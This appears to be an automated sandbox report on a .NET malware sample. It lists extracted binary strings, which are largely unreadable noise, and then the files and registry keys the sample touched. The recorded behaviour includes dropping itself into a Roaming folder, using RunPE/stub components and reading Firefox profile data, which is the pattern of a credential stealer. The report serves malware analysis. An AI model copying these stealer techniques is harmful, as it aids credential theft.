:Q]m
h#M^
}1U^
GDgvL
t?n
ug?lb
XK Q)
smVp
T/uyd?NR
~Le~
p24C
!+*`
=-QJ
J O
b10!
A-1oa
6rj2
IEnumerable`1
set_IV
s\MN
?]X2E
get_Module
\_1&
X\-&n
2s
7D$F
"P8%
%] 0
)ohS)3wW
, pt@
@}E
jD&s@l
1x/~
\,e~o#
pm>&
jI+nu
BE]}F
{k7+
n cw`P
wl a8S
9m{0
WlR:P
&&s5
P+ch
/&~Y
D<P`
`p,y
[NF;
Z /G
[ Y..S$X
@"0>
6b<
GwR'
2qkX
Q4LQ
~4^4
:?e/]CI6q
3[DO
%:l{TSp
| T< m
$wod~
@<5R'
*2_G
O Kz
QSp5
\Yvu
zSf?
}S A>,
tF?Z
P@pw
,/Kl
`]]T^
' (d
\}M@
cK8y
Cg?s
XI>(2
BR`-
YQa8
"yNO
2!yn
63TF
J.!GB"7
MOO5
H/0&L)
ghA}
E\M%
K`By
BNH 0
`KoD
0XB
'n+e
5ld
jf|Qq
]2G
cS4_a
QFrl
)D1e
h>&^
GetMethod
SV+[
<3?
*Z.u
,= H
U`H0
QR@k
C;gF
yX`}
K;C7
opqW~
2'kTU
mF;n7
: IC%
faS_
izmh
3:&<
stI=<
QGD
uECL
n$>:E
uC+B+
QEG
SYT
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 22:33:08 2018-04-27 22:35:59 171

13 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 22:33:08 2018-04-27 22:35:59 171

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe.config
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\dllhost.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Users\Seven01\AppData\Local\Temp\it-IT\ju2.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ju2.resources\ju2.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ju2.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\ju2.resources\ju2.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\ju2.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ju2.resources\ju2.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ju2.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\ju2.resources\ju2.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2380.20441734
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2380.20441734
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2380.20441781
C:\
C:\Users\Seven01\AppData\Local\Temp\FD76B72EDDF22127370785
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe.config
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe.Local\
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.INI
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\ju2.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\ju2.resources\ju2.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\ju2.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\ju2.resources\ju2.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\ju2.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\ju2.resources\ju2.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\ju2.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\ju2.resources\ju2.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2756.20443593
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2756.20443593
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2756.20443609
C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\Profiles.ini
C:\Users\Seven01\AppData\Local\Temp\FD76B72EDDF2212737078532

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe.config
C:\Users\Seven01\AppData\Local\Temp\dllhost.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe.config
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe
C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\Profiles.ini
C:\Users\Seven01\AppData\Local\Temp\FD76B72EDDF2212737078532

Write Files

C:\Users\Seven01\AppData\Local\Temp\FD76B72EDDF22127370785
C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2380.20441734
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2380.20441734
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2380.20441781
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2756.20443593
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2756.20443593
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2756.20443609

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34a78867\42f2fa68
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
